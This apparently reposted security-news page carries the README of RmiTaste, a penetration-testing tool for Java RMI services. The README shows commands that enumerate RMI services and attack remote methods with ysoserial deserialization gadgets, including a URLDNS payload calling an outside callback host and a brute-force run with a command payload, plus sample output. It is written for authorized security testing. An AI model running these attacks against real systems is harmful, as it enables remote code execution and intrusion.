Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ RmiTaste - Allows Security Professionals To Detect, Enumerate, Interact And Exploit RMI Services By Calling Remote Methods With Gadgets From Ysoseria

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š RmiTaste - Allows Security Professionals To Detect, Enumerate, Interact And Exploit RMI Services By Calling Remote Methods With Gadgets From Ysoseria


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


RmiTaste allows security professionals to detect, enumerate, interact and attack RMI services by calling remote methods with gadgets from ysoserial. It also allows to call remote method with specific parameters.


Disclaimer

RmiTaste was written to aid security professionals in identifying insecure RMI services on systems which the user has prior permission to attack. Unauthorised access to computer systems is illegal and RmiTaste must be used in accordance with all relevant laws. Failure to do so could lead to you being prosecuted. The developers of RmiTaste assume no liability and are not responsible for any misuse or damage caused by this program.


Building and Running

Requires openjdk 11.0.3.

  1. Download ysoserial-master-SNAPSHOT.jar and save it in libs_attack directory (https://github.com/frohoff/ysoserial).
  2. Build project using maven:
    mvn package
  3. Run command:
    java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h


    __________ ._____________ __
    \______ \ _____ |__\__ ___/____ _______/ |_ ____
    | _// \| | | | \__ \ / ___/\ __\/ __ \
    | | \ Y Y \ | | | / __ \_\___ \ | | \ ___/
    |____|_ /__|_| /__| |____| (____ /____ > |__| \___ >
    \/ \/ \/ \/ \/
    @author Marcin Ogorzelski (mzero - @_mzer0) STM Solutions

    Warning: RmiTaste was written to aid security professionals in identifying the
    insecure use of RMI services on systems which the user has prior
    permission to attack. RmiTaste must be used in accordance with all
    relevant laws. Failure to do so could lead to your prosecution.
    The developers assume no liability and are not responsible for any
    misuse or damage caused by this program.

Usage

RmiTaste has 4 modes: conn, enum, attack and call. Each mode has a separate help.

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h
(...)
Usage: <main class> [-h] [COMMAND]
-h, --help display this help message
Commands:
conn check connection to host
enum enumerate RMI service
attack attack RMI registry methods
call call specific method on RMI remote object

conn mode

Conn mode allows to check if port is RMI service port.

# Check if 127.0.0.1:1099 is RMI Service
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste conn -t 127.0.0.1 -p 1099

enum mode

Enum mode allows to fetch information about RMI service such as: remote objects names and classes names that remote object implements or extends. If interface implemented by remote object is available in RmiTaste classpath then RmiTaste will print all remote methods that you can call on this remote object.

# RMI service enumeration
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099

attack mode

Attack mode allows to call remote method with specific gadget chain from ysoserial. Assume that remote object has following methods:

acc1 [object] [127.0.1.1:38293] 
implements java.rmi.Remote [interface]
extends java.lang.reflect.Proxy [class]
implements m0.rmitaste.example.server.ClientAccount [interface]
setPin(java.lang.String param0); [method]
Parameters: param0; may be vulnerable to Java Deserialization! [info]
getBalance(); [method]
deposit(java.lang.Object param0); [method]
Parameters: param0; may be vulnerable to Java Deserialization! [info]
withdraw(float param0); [method]
# Call all remote methods with URLDNS gadget as parameter
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -g "URLDNS" -c "http://rce.mzero.pl"
# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with URLDNS gadget as parameter
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -g "URLDNS" -c "http://rce.mzero.pl"

Option "-gen bruteforce" allows to brute force remote method with gadgets from ysoserial. In this example deposit method will be called multiple times with gadgets from ysoserial.

# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with gadgets from ysoserial and command ping 127.0.0.1
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -gen bruteforce -c "ping 127.0.0.1"

call mode

Call mode allows to call specific method on RMI remote object. Assume that remote object has following methods:

acc1 [object] [127.0.1.1:38293] 
implements java.rmi.Remote [interface]
extends java.lang.reflect.Proxy [class]
implements m0.rmitaste.example.server.ClientAccount [interface]
setPin(java.lang.String param0); [method]
Parameters: param0; may be vulnerable to Java Deserialization! [info]
getBalance(); [method]
deposit(java.lang.Object param0); [method]
Parameters: param0; may be vulnerable to Java Deserialization! [info]
withdraw(float param0); [method]
# Call m0.rmitaste.example.server.ClientAccount.getBalance method on acc1 remote object
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:getBalance"
# Call m0.rmitaste.example.server.ClientAccount.setPin("1234") method on acc1 remote object
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:setPin" -mp "string=1234"

Examples

Demo server is available here.

  1. Run demo server.

  2. Enumerate target.

root@keyisinyourmind:/media/sf_pentest2/Tools/python/Toolset/Others/RmiTasteTool# java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099
acc1 [object] [127.0.1.1:42881]
extends java.rmi.server.RemoteObjectInvocationHandler [class]
implements java.rmi.Remote [interface]
extends java.lang.reflect.Proxy [class]
extends java.rmi.server.RemoteObject [class]
implements m0.rmitaste.example.server.ClientAccount [interface]
No methods found. I don't have remote object interface. Give it to me!

acc2 [object] [127.0.1.1:42881]
extends java.rmi.server.RemoteObjectInvocationHandler [class]
implements java.rmi.Remote [interface]
extends java.lang.reflect.Proxy [class]
extends java.rmi.server.RemoteObject [class]
implements m0.rmitaste.example.server.ClientAccount [interface]
No methods found. I don't have remote object interface. Give it to me!

As you can see, RmiTaste needs interface of remote object. During pentests you will have to find this interface. In this example, just copy rmitaste.examples-1.0-SNAPSHOT-all.jar to libs_attack directory. Enumerate target again:

acc1 [object] [127.0.1.1:42881] 
extends java.rmi.server.RemoteObjectInvocationHandler [class]
implements java.rmi.Remote [interface]
extends java.lang.reflect.Proxy [class]
extends java.rmi.server.RemoteObject [class]
implements m0.rmitaste.example.server.ClientAccount [interface]
setPin(java.lang.String param0); [method]
Parameters: param0; may be vulnerable to Java Deserialization! [info]
getBalance(); [method]
deposit(java.lang.Object param0); [method]
Parameters: param0; may be vulnerable to Java Deserialization! [info]
withdraw(float param0); [method]

acc2 [object] [127.0.1.1:42881]
extends java.rmi.server.RemoteObjectInvocationHandler [class]
implements java.rmi.Remote [interface]
extends java.lang.reflect.Proxy [class]
extends java.rmi.server.RemoteObject [class]
implements m0.rmitaste.example.server.ClientAccount [interface]
set Pin(java.lang.String param0); [method]
Parameters: param0; may be vulnerable to Java Deserialization! [info]
getBalance(); [method]
deposit(java.lang.Object param0); [method]
Parameters: param0; may be vulnerable to Java Deserialization! [info]
withdraw(float param0); [method]

Author

Twitter: @_mzer0

Inspired by: BaRMIe and @h0ng10 article



...



๐Ÿ“Œ RMIScout - Wordlist And Bruteforce Strategies To Enumerate Java RMI Functions And Exploit RMI Parameter Unmarshalling Vulnerabilities


๐Ÿ“ˆ 66.78 Punkte

๐Ÿ“Œ Remote-Method-Guesser - Tool For Java RMI Enumeration And Bruteforce Of Remote Methods


๐Ÿ“ˆ 40.4 Punkte

๐Ÿ“Œ Cce-interact Interact 2.4.1 Help directory traversal


๐Ÿ“ˆ 39.44 Punkte

๐Ÿ“Œ Cce-interact Interact 2.4.1 email_user_key sql injection


๐Ÿ“ˆ 39.44 Punkte

๐Ÿ“Œ Cce-interact Interact 2.4.1 Administrator Account cross site request forgery


๐Ÿ“ˆ 39.44 Punkte

๐Ÿ“Œ CVE-2020-5327 | Dell Security Management Server up to 10.2.9 Java RMI Deserialization RMI Request deserialization


๐Ÿ“ˆ 38.91 Punkte

๐Ÿ“Œ Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI erweiterte Rechte


๐Ÿ“ˆ 36.99 Punkte

๐Ÿ“Œ Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation


๐Ÿ“ˆ 36.99 Punkte

๐Ÿ“Œ Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation


๐Ÿ“ˆ 36.99 Punkte

๐Ÿ“Œ ZTE ZXIPTV-EPG up to 5.09.02 Java RMI Service RMI Request privilege escalation


๐Ÿ“ˆ 36.99 Punkte

๐Ÿ“Œ Apache Cassandra bis 3.11.1 JMX/RMI Interface RMI Request erweiterte Rechte


๐Ÿ“ˆ 36.99 Punkte

๐Ÿ“Œ CVE-2019-18580 | Dell EMC Storage Monitoring/Reporting 4.3.1 Java RMI Deserialization RMI Request deserialization (DSA-2019-176)


๐Ÿ“ˆ 36.99 Punkte

๐Ÿ“Œ ZTE ZXIPTV-EPG bis 5.09.02 Java RMI Service RMI Request erweiterte Rechte


๐Ÿ“ˆ 36.99 Punkte

๐Ÿ“Œ #0daytoday #HPE iMC 7.3 - RMI Java Deserialization Exploit CVE-2017-5792 [remote #exploits #0day #Exploit]


๐Ÿ“ˆ 32.49 Punkte

๐Ÿ“Œ #0daytoday #CatDV 9.2 - RMI Authentication Bypass Exploit [remote #exploits #0day #Exploit]


๐Ÿ“ˆ 32.49 Punkte

๐Ÿ“Œ DOM Manipulation: How to Use Its Methods to Interact with Web Pages


๐Ÿ“ˆ 31.43 Punkte

๐Ÿ“Œ Extending the Exploration and Analysis of Windows RPC Methods Calling other Functions with Ghidra ?, Jupyter Notebooks ? and Graphframes ?!


๐Ÿ“ˆ 29.07 Punkte

๐Ÿ“Œ Many security professionals lack the necessary tools to detect security threats


๐Ÿ“ˆ 28.74 Punkte

๐Ÿ“Œ OP thinks that heโ€™s being followed, and I canโ€™t give professionals advice, so I came to the professionals!


๐Ÿ“ˆ 28.74 Punkte

๐Ÿ“Œ Accessibility services and how users interact with them


๐Ÿ“ˆ 27.69 Punkte

๐Ÿ“Œ #0daytoday #Oracle WebLogic 12.1.2.0 RMI Registry UnicastRef Object Java Deserialization Remote Cod [#0day #Exploit]


๐Ÿ“ˆ 27.59 Punkte

๐Ÿ“Œ Enumerate Networks & Services with GoScan [Tutorial]


๐Ÿ“ˆ 27.5 Punkte

๐Ÿ“Œ awsEnum: Enumerate AWS services


๐Ÿ“ˆ 27.5 Punkte

๐Ÿ“Œ ๐Ÿ“ข Calling all Software Professionals in Fintech! ๐Ÿš€


๐Ÿ“ˆ 27.26 Punkte

๐Ÿ“Œ What languages can you use to interact with Azure services?


๐Ÿ“ˆ 25.9 Punkte

๐Ÿ“Œ Most Important Methods to Detect and Prevent Identity Theft From Hackers


๐Ÿ“ˆ 24.93 Punkte

๐Ÿ“Œ LDAP_Search - Tool To Perform LDAP Queries And Enumerate Users, Groups, And Computers From Windows Domains


๐Ÿ“ˆ 24.9 Punkte

๐Ÿ“Œ #0daytoday #Hashicorp Consul Services API Remote Command Execution Exploit [remote #exploits #0day #Exploit]


๐Ÿ“ˆ 24.37 Punkte

๐Ÿ“Œ #0daytoday #Microsoft Edge Chakra JIT Incorrect GenerateBailOut Calling Patterns Exploit [#0day #Exploit]


๐Ÿ“ˆ 23.57 Punkte

๐Ÿ“Œ 10 methods to detect file system types in Linux


๐Ÿ“ˆ 23.14 Punkte

๐Ÿ“Œ Setup Sublist3r and Enumerate Subdomain Faster


๐Ÿ“ˆ 23.11 Punkte

๐Ÿ“Œ httpscreenshot tool - Quickly enumerate web servers on your network and screenshot them


๐Ÿ“ˆ 23.11 Punkte

๐Ÿ“Œ DecryptTeamViewer - Enumerate And Decrypt TeamViewer Credentials From Windows Registry


๐Ÿ“ˆ 23.11 Punkte

๐Ÿ“Œ Enumerate and Zip in Python


๐Ÿ“ˆ 23.11 Punkte











matomo